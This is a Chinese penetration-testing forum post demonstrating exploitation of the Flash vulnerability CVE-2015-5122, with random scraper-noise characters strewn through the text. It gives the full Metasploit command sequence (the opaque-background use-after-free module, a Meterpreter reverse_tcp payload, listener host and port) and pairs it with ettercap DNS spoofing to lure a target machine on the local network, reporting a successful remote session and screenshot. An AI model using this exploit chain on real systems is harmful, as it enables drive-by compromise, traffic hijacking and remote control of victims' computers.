中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

. v$ W0 _# `7 e( O 二、cve2015-5122漏洞实例演示虚拟机 8 Z" I- N9 l, g& d; y1 H t

' n8 c/ X" \; M1 @0 ?5 Q 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： + Q4 A$ U. q7 a7 O) r5 j1 E% V1 J, B7 l

/ `% H7 o! {% u U2 }" ~- j search cve-2015-5122如图： & Z8 m7 @% ^/ R$ M$ A

0 v+ b) P* i1 {; b6 g ^/ c : | q; t- C7 p( J( ?

; n" }7 i5 C+ h& H) c$ N- _ 下面我们敲如下命令： , }# L9 t4 M* `* R ^0 d2 P9 {

! C1 q/ x. K" J use exploit/multi/browser/adobe_flash_opaque_background_uaf 4 ?- |# L! K0 G& v. j

1 F+ y6 {! u' k# q set PAYLOAD windows/meterpreter/reverse_tcp ; R+ E8 d! a$ a# x! h+ _* [0 i/ S

: b& x6 W9 `- ]8 W( A* r3 b& t set LHOST 192.168.0.109 5 j5 ~: B) j- F1 I* R7 b ~5 p

5 v& d0 C; q! n* p set URIPATH / /*根目录*/ # V$ u# j8 Q' A1 l- v# f' ?2 w

; \- Z0 r8 O* B& h8 Y4 @) J+ @" X1 H5 | set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 9 D k8 X: o' C, @& K& N

( p. g: Y% p7 Y. e5 R3 T! I set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 5 u7 M1 B# L5 }4 p% ^& B% D

' W7 o- M$ B7 f) n8 U4 R: } 然后show options如图： 7 ?" `- x! s6 \1 w

" Y2 ]( J) `+ }! k5 j* } 8 f7 h4 U" i+ [" [1 I

+ h! Y& _6 l1 r1 h0 P' h( W0 _ 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
8 l! U( W1 w% }& t/ ~ 0 y9 _3 ^, X" P

' t! t7 Q8 h9 i7 m8 d' P 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 2 k" t4 R% t- U& b* v

y; e) x C& \. B) ]5 ? Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf . t; I# t& `4 O+ r1 P

6 I O8 Q% v: ]# D) U 1 E3 a! \1 {/ A$ K: Y" {3 b( V8 ]

! }! P: j4 u. a' K$ S3 n 成功了，这时候我们断开ettercap，如图： : i+ \& b f) f. Z# f: F+ _6 H

7 L: z" u0 T8 k7 e $ @; x M8 q" R3 \: @; j$ u3 h

. ~# F) j% w7 W! C# x9 I Screenshot如图： 4 J$ D7 d8 n. d3 Q2 F9 j+ c

3 _: ^+ l. S& p5 w/ m$ w3 d1 G $ O( S2 H9 W5 Q/ u) r

1 P( {% a5 ?1 v / u# c8 z% ^: q0 ?" v

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)